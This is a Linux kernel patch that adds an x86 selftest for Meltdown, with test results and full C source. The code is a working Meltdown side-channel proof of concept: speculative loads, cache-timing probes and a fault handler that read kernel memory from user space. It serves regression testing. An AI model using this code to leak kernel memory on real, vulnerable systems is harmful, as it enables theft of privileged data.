[PATCH] selftest/x86/meltdown: Add a selftest for meltdown

From: Aaron Lu
Date: Thu Jan 05 2023 - 07:35:52 EST


To catch potential programming errors, such as mistakenly setting the Global
bit on kernel page table entries, add a selftest for meltdown.

This selftest is based on Pavel Boldin's work at:
https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c

In addition to the existing test of reading the kernel variable
saved_command_line from user space, one more test is added: reading a user
local variable through its kernel direct map address. For the existing
test (reading saved_command_line) to report a failure, both the high kernel
mapping and the low kernel mapping have to be leaked; for the added
test (reading a local variable), a leak of the low kernel mapping alone is
enough to trigger a test failure, so both tests are useful.

Test results of 10 runs:

On v6.1-rc8 with nopti kernel cmdline option:

host test_out_rate_1 test_out_rate_2
lkp-bdw-de1 50% 100%
lkp-hsw-d01 70% 100%
lkp-hsw-d02 0% 80%
lkp-hsw-d03 60% 100%
lkp-hsw-d04 20% 100%
lkp-hsw-d05 60% 100%
lkp-ivb-d01 0% 70%
lkp-kbl-d01 100% 100%
lkp-skl-d02 100% 90%
lkp-skl-d03 90% 100%
lkp-skl-d05 60% 100%
kbl-vm 100% 80%
2 other machines have 0% rate for both tests.

bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.

test_out_rate_1: the rate at which the test reports a failure when reading
saved_command_line from user space;
test_out_rate_2: the rate at which the test reports a failure when reading a
user local variable through its kernel direct map address from user space.

On v5.19 without nopti cmdline option:
host test_out_rate_2
lkp-bdw-de1 80%
lkp-hsw-4ex1 50%
lkp-hsw-d01 30%
lkp-hsw-d03 10%
lkp-hsw-d04 10%
lkp-kbl-d01 10%
kbl-vm 80%
7 other machines have 0% rate for test2.

Also tested on an i386 VM with 512M memory and the test out rate is 100%
when adding nopti to kernel cmdline with v6.1-rc8.

Main changes I made from Pavel Boldin's meltdown test are:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library
functions;
- Coding style changes: placing the function return type in the same
line of the function.

Signed-off-by: Aaron Lu <aaron.lu@xxxxxxxxx>
---
Notable changes from RFC v3:
- Drop RFC tag;
- Change the base code from zlib licensed one to GPL licensed one.

tools/testing/selftests/x86/Makefile | 2 +-
tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++
2 files changed, 530 insertions(+), 1 deletion(-)
create mode 100644 tools/testing/selftests/x86/meltdown.c

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
check_initial_reg_state sigreturn iopl ioperm \
test_vsyscall mov_ss_trap \
- syscall_arg_fault fsgsbase_restore sigaltstack
+ syscall_arg_fault fsgsbase_restore sigaltstack meltdown
TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
test_FCMOV test_FCOMI test_FISTTP \
vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..fcb211dc9038
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,529 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2018 Pavel Boldin <pboldin@xxxxxxxxxxxxxx>
+ * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdarg.h>
+#include <string.h>
+#include <signal.h>
+#include <ucontext.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <sys/utsname.h>
+#include <sys/mman.h>
+
+/* Page geometry used when translating virtual addresses via pagemap. */
+#define PAGE_SHIFT 12
+#define PAGE_SIZE 0x1000
+/* 1 << 30: get_directmap_base() rounds the direct map base down to this. */
+#define PUD_SHIFT 30
+#define PUD_SIZE (1UL << PUD_SHIFT)
+#define PUD_MASK (~(PUD_SIZE - 1))
+
+/* NOTE(review): cache_miss_threshold is not referenced anywhere in this file. */
+size_t cache_miss_threshold;
+/* Base of the kernel direct map; filled in by get_directmap_base(). */
+unsigned long directmap_base;
+
+/*
+ * Layout of the probe array: BITS_BY_READ slots, TARGET_SIZE (1 << 9 = 512)
+ * bytes apart. The "shl $9" in speculate() hard-codes TARGET_OFFSET.
+ */
+#define TARGET_OFFSET 9
+#define TARGET_SIZE (1 << TARGET_OFFSET)
+#define BITS_BY_READ 2
+
+/*
+ * Read the time stamp counter.
+ *
+ * Returns the 64-bit value assembled from EDX:EAX as produced by RDTSC.
+ */
+static inline uint64_t rdtsc(void)
+{
+ uint32_t eax, edx;
+ uint64_t tsc_val;
+ /*
+ * The leading lfence waits (on Intel CPUs) until all previous
+ * instructions have been executed before RDTSC runs. The trailing
+ * lfence makes sure RDTSC has executed before any subsequent
+ * instruction does.
+ */
+ __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx));
+ tsc_val = ((uint64_t)edx) << 32 | eax;
+ return tsc_val;
+}
+
+/* Execute CLFLUSH on the cache line containing the byte at @__p. */
+static inline void clflush(volatile void *__p)
+{
+ /* "+m" marks the byte as read and written so the asm is not reordered around accesses to it. */
+ asm volatile("clflush %0" : "+m" (*(volatile char *)__p));
+}
+
+/* Probe array: one slot of TARGET_SIZE bytes per possible value of the bit being read. */
+static char target_array[BITS_BY_READ * TARGET_SIZE];
+
+/* Flush the first byte's cache line of every slot in target_array. */
+static void clflush_target(void)
+{
+ int i;
+
+ for (i = 0; i < BITS_BY_READ; i++)
+ clflush(&target_array[i * TARGET_SIZE]);
+}
+
+/*
+ * Labels defined inside speculate()'s inline asm. sigsegv() compares the
+ * faulting instruction pointer against failshere and resumes execution at
+ * stopspeculate.
+ */
+extern char failshere[];
+extern char stopspeculate[];
+
+/*
+ * Attempt to leak one bit of the byte at @addr into the cache state of
+ * target_array.
+ *
+ * @addr: address to read; the load at "failshere" is expected to fault, and
+ *        sigsegv() then skips to "stopspeculate".
+ * @bit:  index of the bit within the byte to extract (passed in %cl).
+ *
+ * The asm loads the byte, rotates the selected bit into bit 0, masks it and
+ * shifts it left by 9 (TARGET_OFFSET). If the result is non-zero, the
+ * dependent load touches target_array[TARGET_SIZE]; if it is zero, "jz 1b"
+ * jumps back to the start. Only slot 1 of target_array is therefore ever
+ * touched by this code. The function is noinline so the two global labels
+ * are emitted exactly once.
+ */
+static void __attribute__((noinline)) speculate(unsigned long addr, char bit)
+{
+	register char mybit asm ("cl") = bit;
+#ifdef __x86_64__
+	asm volatile (
+		"1:\n\t"
+
+		/* presumably a delay chain so the faulting load retires late -- TODO confirm */
+		".rept 300\n\t"
+		"add $0x141, %%rax\n\t"
+		".endr\n"
+
+		"failshere:\n\t"
+		"movb (%[addr]), %%al\n\t"
+		"ror %[bit], %%rax\n\t"
+		"and $1, %%rax\n\t"
+		"shl $9, %%rax\n\t"
+		"jz 1b\n\t"
+
+		"movq (%[target], %%rax, 1), %%rbx\n"
+
+		"stopspeculate: \n\t"
+		"nop\n\t"
+		:
+		: [target] "r" (target_array),
+		  [addr] "r" (addr),
+		  [bit] "r" (mybit)
+		: "rax", "rbx"
+	);
+#else /* defined(__x86_64__) */
+	asm volatile (
+		"1:\n\t"
+
+		".rept 300\n\t"
+		"add $0x141, %%eax\n\t"
+		".endr\n"
+
+		"failshere:\n\t"
+		"movb (%[addr]), %%al\n\t"
+		"ror %[bit], %%eax\n\t"
+		"and $1, %%eax\n\t"
+		"shl $9, %%eax\n\t"
+		"jz 1b\n\t"
+
+		"movl (%[target], %%eax, 1), %%ebx\n"
+
+		"stopspeculate: \n\t"
+		"nop\n\t"
+		:
+		: [target] "r" (target_array),
+		  [addr] "r" (addr),
+		  [bit] "r" (mybit)
+		/* 32-bit code uses %eax/%ebx, so name those registers here */
+		: "eax", "ebx"
+	);
+#endif
+}
+
+/* On i386 the instruction pointer slot in gregs[] is named REG_EIP. */
+#ifdef __i386__
+# define REG_RIP REG_EIP
+#endif
+
+/*
+ * SIGSEGV handler installed by set_signal().
+ *
+ * If the fault happened at the "failshere" label inside speculate(), rewrite
+ * the saved instruction pointer so execution resumes at "stopspeculate".
+ * A fault anywhere else is reported and the process aborts.
+ *
+ * @sig and @siginfo are unused; @context is the ucontext_t of the
+ * interrupted code.
+ */
+static void sigsegv(int sig, siginfo_t *siginfo, void *context)
+{
+ ucontext_t *ucontext = context;
+ unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP];
+ if (*prip != (unsigned long)failshere) {
+ /* NOTE(review): printf() is not async-signal-safe; tolerated here because we abort right after. */
+ printf("Segmentation fault at unexpected location %lx\n", *prip);
+ abort();
+ }
+ /* Skip the rest of the asm sequence in speculate(). */
+ *prip = (unsigned long)stopspeculate;
+ return;
+}
+
+/*
+ * Register sigsegv() as the SA_SIGINFO-style handler for SIGSEGV.
+ *
+ * Returns the result of sigaction(): 0 on success, -1 on failure.
+ */
+static int set_signal(void)
+{
+	struct sigaction sa;
+
+	memset(&sa, 0, sizeof(sa));
+	sa.sa_flags = SA_SIGINFO;
+	sa.sa_sigaction = sigsegv;
+
+	return sigaction(SIGSEGV, &sa, NULL);
+}
+
+/*
+ * Measure how long a single read of *@addr takes.
+ *
+ * Returns the difference between two rdtsc() readings taken around the
+ * load, truncated to int.
+ */
+static inline int get_access_time(volatile char *addr)
+{
+ unsigned long long time1, time2;
+ /* volatile sink so the load being timed is not optimised away */
+ volatile int j __attribute__((__unused__));
+
+ time1 = rdtsc();
+ j = *addr;
+ time2 = rdtsc();
+
+ return time2 - time1;
+}
+
+/* Access times at or below this count as a cache hit; set by set_cache_hit_threshold(). */
+static int cache_hit_threshold;
+/* Per-slot count of observed cache hits; reset by readbit() before each bit. */
+static int hist[BITS_BY_READ];
+
+/*
+ * Time one access to each slot of target_array and bump hist[i] for every
+ * slot whose access time is at or below cache_hit_threshold.
+ */
+static void check(void)
+{
+ int i, time;
+ volatile char *addr;
+
+ for (i = 0; i < BITS_BY_READ; i++) {
+ addr = &target_array[i * TARGET_SIZE];
+
+ time = get_access_time(addr);
+
+ if (time <= cache_hit_threshold)
+ hist[i]++;
+ }
+}
+
+/* Number of flush/speculate/probe rounds performed per bit. */
+#define CYCLES 10000
+
+/*
+ * Try to read one bit of the byte at @addr through the cache side channel.
+ *
+ * @fd:   descriptor whose first bytes are re-read every round to keep the
+ *        data being stolen hot in cache and TLB.
+ * @addr: address of the byte to leak.
+ * @bit:  bit index within that byte.
+ *
+ * Returns 1 if slot 1 of target_array was seen cached in more than 10% of
+ * the rounds, 0 otherwise.
+ */
+static int readbit(int fd, unsigned long addr, char bit)
+{
+	int i, ret;
+	static char buf[256];
+
+	memset(hist, 0, sizeof(hist));
+
+	for (i = 0; i < CYCLES; i++) {
+		/*
+		 * Make the to-be-stolen data cache and tlb hot
+		 * to increase success rate.
+		 */
+		ret = pread(fd, buf, sizeof(buf), 0);
+		if (ret < 0)
+			printf("[INFO]\tCan't read fd\n");
+
+		clflush_target();
+
+		speculate(addr, bit);
+		check();
+	}
+
+	if (hist[1] > CYCLES / 10)
+		return 1;
+	return 0;
+}
+
+/*
+ * Assemble one byte at @addr from eight readbit() calls, least significant
+ * bit first. @fd is passed through to readbit().
+ *
+ * Returns the reconstructed byte value (0..255).
+ */
+static int readbyte(int fd, unsigned long addr)
+{
+	int value = 0;
+	int pos;
+
+	for (pos = 0; pos < 8; pos++) {
+		if (readbit(fd, addr, pos))
+			value |= 1 << pos;
+	}
+
+	return value;
+}
+
+/*
+ * Integer square root.
+ *
+ * Returns floor(sqrt(@val)) for positive @val and 0 for @val <= 0.
+ *
+ * Newton's iteration is started from val / 2, which is not below the true
+ * root for val >= 4, and stops as soon as the estimate no longer
+ * decreases. This avoids both the division by a zero estimate for val == 1
+ * and oscillating between two neighbouring values.
+ */
+static int mysqrt(long val)
+{
+	long root, next;
+
+	if (val <= 0)
+		return 0;
+	if (val < 4)
+		return 1;
+
+	root = val / 2;
+	next = (root + val / root) / 2;
+	while (next < root) {
+		root = next;
+		next = (root + val / root) / 2;
+	}
+
+	return (int)root;
+}
+
+/* Number of timed accesses averaged for each of the cached/uncached estimates. */
+#define ESTIMATE_CYCLES 1000000
+
+/*
+ * Calibrate cache_hit_threshold.
+ *
+ * Measures the average access time of target_array[0] when it is left in
+ * cache and when it is flushed before every access, then sets the threshold
+ * to mysqrt(cached * uncached) and prints all three values.
+ */
+static void set_cache_hit_threshold(void)
+{
+ long cached, uncached, i;
+
+ /* The sum from this first pass is discarded (cached is reset below); presumably a warm-up. */
+ for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+ cached += get_access_time(target_array);
+
+ for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+ cached += get_access_time(target_array);
+
+ /* Flush before every access so each read is timed with the line evicted. */
+ for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
+ clflush(target_array);
+ uncached += get_access_time(target_array);
+ }
+
+ cached /= ESTIMATE_CYCLES;
+ uncached /= ESTIMATE_CYCLES;
+
+ cache_hit_threshold = mysqrt(cached * uncached);
+
+ printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n",
+ cached, uncached, cache_hit_threshold);
+}
+
+/*
+ * Look up @symname in a symbol table file whose lines have the form
+ * "<hex address> <type char> <name>", optionally followed by more fields.
+ *
+ * @filename: path of the file to scan.
+ * @symname:  exact symbol name to search for.
+ *
+ * Returns the address of the first matching symbol, or 0 if the file cannot
+ * be opened, the symbol is not present, or its listed address is 0.
+ *
+ * The file is read line by line so that end of file terminates the scan,
+ * and lines that do not parse (or carry extra trailing fields) are skipped
+ * instead of ending the search early.
+ */
+static unsigned long find_symbol_in_file(const char *filename, const char *symname)
+{
+	size_t symlen = strlen(symname);
+	unsigned long addr, found_addr = 0;
+	char *line = NULL;
+	size_t cap = 0;
+	char type;
+	FILE *fp;
+
+	fp = fopen(filename, "r");
+	if (!fp) {
+		printf("[INFO]\tFailed to open %s\n", filename);
+		return 0;
+	}
+
+	while (getline(&line, &cap, fp) != -1) {
+		const char *name;
+		int off = 0;
+
+		/* %n records where the symbol name starts within the line */
+		if (sscanf(line, "%lx %c %n", &addr, &type, &off) < 2 || !off)
+			continue;
+
+		name = line + off;
+		if (strncmp(name, symname, symlen))
+			continue;
+
+		/* Require a full-token match, not just a common prefix */
+		if (name[symlen] == '\0' || isspace((unsigned char)name[symlen])) {
+			found_addr = addr;
+			break;
+		}
+	}
+
+	free(line);
+	fclose(fp);
+
+	return found_addr;
+}
+
+/*
+ * Find the address of kernel symbol @name.
+ *
+ * /proc/kallsyms is tried first; if that yields no non-zero address, the
+ * lookup falls back to /boot/System.map-<release>, where <release> comes
+ * from uname().
+ *
+ * Returns the symbol address, or 0 if it could not be determined.
+ */
+static unsigned long find_kernel_symbol(const char *name)
+{
+	char systemmap[256];
+	struct utsname utsname;
+	unsigned long addr;
+
+	addr = find_symbol_in_file("/proc/kallsyms", name);
+	if (addr)
+		return addr;
+
+	if (uname(&utsname) < 0)
+		return 0;
+
+	/* Bounded formatting: never write past systemmap[] */
+	snprintf(systemmap, sizeof(systemmap), "/boot/System.map-%s", utsname.release);
+
+	return find_symbol_in_file(systemmap, name);
+}
+
+/* Address of the kernel's saved_command_line pointer variable. */
+static unsigned long saved_cmdline_addr;
+/* File descriptor handed to readbyte() to keep the target data hot. */
+static int spec_fd;
+
+/* Maximum number of command line bytes compared. */
+#define READ_SIZE 32
+
+/*
+ * Try to read the kernel command line through the side channel and compare
+ * it with the contents of /proc/cmdline.
+ *
+ * First the pointer stored in the kernel variable saved_command_line is
+ * read byte by byte, then up to READ_SIZE bytes of the string it points to.
+ *
+ * Returns -1 if more than half of the compared bytes match (leak found),
+ * 0 if no leak was found or the test had to be skipped.
+ */
+static int test_read_saved_command_line(void)
+{
+	unsigned int i, score = 0;
+	unsigned long addr;
+	unsigned long size;
+	char read[READ_SIZE] = { 0 };
+	char expected[READ_SIZE] = { 0 };
+	int expected_len;
+	int ret;
+
+	saved_cmdline_addr = find_kernel_symbol("saved_command_line");
+	if (!saved_cmdline_addr) {
+		printf("[SKIP]\tCan not find symbol saved_command_line\n");
+		return 0;
+	}
+	printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr);
+
+	spec_fd = open("/proc/cmdline", O_RDONLY);
+	if (spec_fd == -1) {
+		printf("[SKIP]\tCan not open /proc/cmdline\n");
+		return 0;
+	}
+
+	expected_len = pread(spec_fd, expected, sizeof(expected), 0);
+	if (expected_len < 0) {
+		printf("[SKIP]\tCan't read /proc/cmdline\n");
+		/* do not leak the descriptor on the skip path */
+		close(spec_fd);
+		return 0;
+	}
+
+	/* read the pointer value stored at saved_cmdline_addr */
+	addr = saved_cmdline_addr;
+	size = sizeof(addr);
+	for (i = 0; i < size; i++) {
+		read[i] = readbyte(spec_fd, addr);
+		addr++;
+	}
+
+	/* read the string that pointer refers to */
+	memcpy(&addr, read, sizeof(addr));
+	memset(read, 0, sizeof(read));
+	printf("[INFO]\tsaved_command_line: 0x%lx\n", addr);
+	size = expected_len;
+
+	/* A zero pointer means nothing was leaked; score stays 0 */
+	if (!addr)
+		goto done;
+
+	for (i = 0; i < size; i++) {
+		read[i] = readbyte(spec_fd, addr);
+		addr++;
+	}
+
+	for (i = 0; i < size; i++)
+		if (expected[i] == read[i])
+			score++;
+
+done:
+	if (score > size / 2) {
+		printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n");
+		ret = -1;
+	} else {
+		printf("[OK]\ttest_read_saved_command_line: no leak found.\n");
+		ret = 0;
+	}
+
+	close(spec_fd);
+
+	return ret;
+}
+
+/*
+ * Determine the base address of the kernel direct map.
+ *
+ * Scans /sys/kernel/debug/page_tables/kernel for a line containing
+ * "Kernel Mapping" and parses the "0x..." address at the start of the line
+ * that follows it. The value is rounded down with PUD_MASK and stored in
+ * directmap_base.
+ *
+ * Returns 0 on success, -1 if the file cannot be opened or no address
+ * could be parsed.
+ */
+static int get_directmap_base(void)
+{
+	char *line = NULL;
+	int status = -1;
+	size_t cap;
+	FILE *f;
+
+	f = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+	if (f == NULL)
+		return -1;
+
+	while (getline(&line, &cap, f) != -1) {
+		if (strstr(line, "Kernel Mapping") == NULL)
+			continue;
+
+		/* The address is on the line right after the marker */
+		if (getline(&line, &cap, f) == -1)
+			continue;
+		if (sscanf(line, "0x%lx", &directmap_base) != 1)
+			continue;
+
+		printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+		directmap_base &= PUD_MASK;
+		status = 0;
+		break;
+	}
+
+	fclose(f);
+	free(line);
+	return status;
+}
+
+/*
+ * Translate a virtual address of this process to a physical address using
+ * /proc/self/pagemap.
+ *
+ * @virt: virtual address to translate.
+ * @phys: receives the physical address on success.
+ *
+ * The 64-bit pagemap entry is interpreted as: bit 63 = page present,
+ * bits 0-54 = page frame number. A PFN of 0 is treated as "not permitted
+ * to see the PFN".
+ *
+ * Returns 0 on success, -1 on any failure (each failure prints an [INFO]
+ * line).
+ */
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+	unsigned long pfn;
+	uint64_t val;
+	ssize_t nread;
+	int ret = -1;
+	int fd;
+
+	fd = open("/proc/self/pagemap", O_RDONLY);
+	if (fd == -1) {
+		printf("[INFO]\tFailed to open pagemap\n");
+		return -1;
+	}
+
+	/* A short read would leave val partly uninitialised, so require a full entry */
+	nread = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+	if (nread != (ssize_t)sizeof(val)) {
+		printf("[INFO]\tFailed to read pagemap\n");
+		goto out;
+	}
+
+	if (!(val & (1ULL << 63))) {
+		printf("[INFO]\tPage not present according to pagemap\n");
+		goto out;
+	}
+
+	pfn = val & ((1ULL << 55) - 1);
+	if (pfn == 0) {
+		printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+		goto out;
+	}
+
+	*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+	ret = 0;
+
+out:
+	close(fd);
+	return ret;
+}
+
+/*
+ * Try to read a user-space string through its kernel direct map alias.
+ *
+ * A known string is written into a shared file mapping, the page's physical
+ * address is looked up via virt_to_phys(), and the bytes are then read
+ * through the side channel at directmap_base + phys.
+ *
+ * Returns 1 if the whole string was recovered (leak found), 0 if no leak
+ * was found or the test had to be skipped. All resources acquired along the
+ * way are released on every path.
+ */
+static int test_read_local_var(void)
+{
+	char path[] = "/tmp/meltdown.XXXXXX";
+	char string[] = "test string";
+	unsigned long phys;
+	char *result = NULL;
+	void *p = MAP_FAILED;
+	int i, len;
+	int ret = 0;
+
+	if (get_directmap_base() == -1) {
+		printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n");
+		return 0;
+	}
+
+	spec_fd = mkstemp(path);
+	if (spec_fd == -1) {
+		printf("[SKIP]\tCan not open %s\n", path);
+		return 0;
+	}
+	/* Only the descriptor is needed; drop the name so no file is left in /tmp */
+	unlink(path);
+
+	if (ftruncate(spec_fd, PAGE_SIZE) == -1) {
+		printf("[SKIP]\tCan not resize temporary file\n");
+		goto out;
+	}
+
+	p = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0);
+	if (p == MAP_FAILED) {
+		printf("[SKIP]\tmmap spec_fd failed\n");
+		goto out;
+	}
+	memcpy(p, string, sizeof(string));
+
+	if (virt_to_phys((unsigned long)p, &phys) == -1) {
+		printf("[SKIP]\tCan not convert virtual address to physical address\n");
+		goto out;
+	}
+
+	len = strlen(string);
+	result = calloc(1, len + 1);
+	if (!result) {
+		printf("[SKIP]\tNot enough memory for malloc\n");
+		goto out;
+	}
+
+	/* Stop at the first zero byte: nothing was leaked for that position */
+	for (i = 0; i < len; i++, phys++) {
+		result[i] = readbyte(spec_fd, directmap_base + phys);
+		if (result[i] == 0)
+			break;
+	}
+
+	ret = !strncmp(string, result, len);
+	if (ret)
+		printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n");
+	else
+		printf("[OK]\ttest_read_local_var: no leak found.\n");
+
+out:
+	free(result);
+	if (p != MAP_FAILED)
+		munmap(p, PAGE_SIZE);
+	close(spec_fd);
+
+	return ret;
+}
+
+/*
+ * Entry point: calibrate the cache timing threshold, install the SIGSEGV
+ * handler and run both leak tests.
+ *
+ * Returns -1 if either test reports a leak, 0 otherwise (including when
+ * the handler cannot be installed and the run is skipped).
+ */
+int main(void)
+{
+	int local_var_leak, cmdline_leak;
+
+	printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+	set_cache_hit_threshold();
+	memset(target_array, 1, sizeof(target_array));
+
+	if (set_signal() < 0) {
+		printf("[SKIP]\tCan not set handler for segfault\n");
+		return 0;
+	}
+
+	local_var_leak = test_read_local_var();
+	cmdline_leak = test_read_saved_command_line();
+
+	return (local_var_leak || cmdline_leak) ? -1 : 0;
+}
--
2.39.0